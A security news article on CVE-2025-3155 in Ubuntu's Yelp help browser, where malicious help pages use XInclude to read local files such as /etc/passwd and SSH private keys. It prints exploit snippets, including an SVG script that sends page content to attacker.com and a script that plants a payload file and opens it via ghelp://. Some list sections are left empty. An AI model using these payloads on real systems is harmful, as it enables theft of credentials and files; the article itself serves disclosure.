Security researchers have uncovered a critical vulnerability (CVE-2025-3155) in Ubuntu’s default help browser Yelp that could expose sensitive system files including SSH private keys.
The flaw impacts Ubuntu desktop installations and stems from improper handling of XML content in GNOME’s help documentation system.
Affected Systems:
Vulnerability Chain:
<include href="/etc/passwd" xmlns="http://www.w3.org/2001/XInclude"/>
<svg:script>onload=_=>fetch("http://attacker.com", {body:document.body})</svg:script>
Attack Scenario Walkthrough
Key Exploit Code Snippet:
<script>
let payloadPage = `<?xml...>
<include href="/proc/self/cwd/.ssh/id_rsa"/>
<svg:script>onload=_=>fetch("http://attacker.com",...)</svg:script>`;
function exp() {
const blob = new Blob([payloadPage], {type: 'text/plain'});
const a = document.createElement('a');
a.href = URL.createObjectURL(blob);
a.download = 'index.page';
a.click();
location = 'ghelp:///proc/self/cwd/Downloads';
}
</script>
Canonical has released patches in Ubuntu security updates dated April 7, 2025. Users are urged to apply updates immediately through standard package channels.
This vulnerability demonstrates three critical risks:
Security researcher noted: “This chain shows how apparently harmless documentation tools can become attack vectors when combined with modern web technologies. The ghelp:// handler’s file inclusion capabilities create unexpected trust boundaries.”
Ongoing investigations continue to determine if this vulnerability was exploited in wild. Users and enterprises are advised to audit SSH key usage and monitor for suspicious authentication attempts.
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
A new project has exposed a critical attack vector that exploits protocol vulnerabilities to disrupt…
A threat actor known as #LongNight has reportedly put up for sale remote code execution…
Ivanti disclosed two critical vulnerabilities, identified as CVE-2025-4427 and CVE-2025-4428, affecting Ivanti Endpoint Manager Mobile…
Hackers are increasingly targeting macOS users with malicious clones of Ledger Live, the popular application…
The European Union has escalated its response to Russia’s ongoing campaign of hybrid threats, announcing…
Venice.ai has rapidly emerged as a disruptive force in the AI landscape, positioning itself as…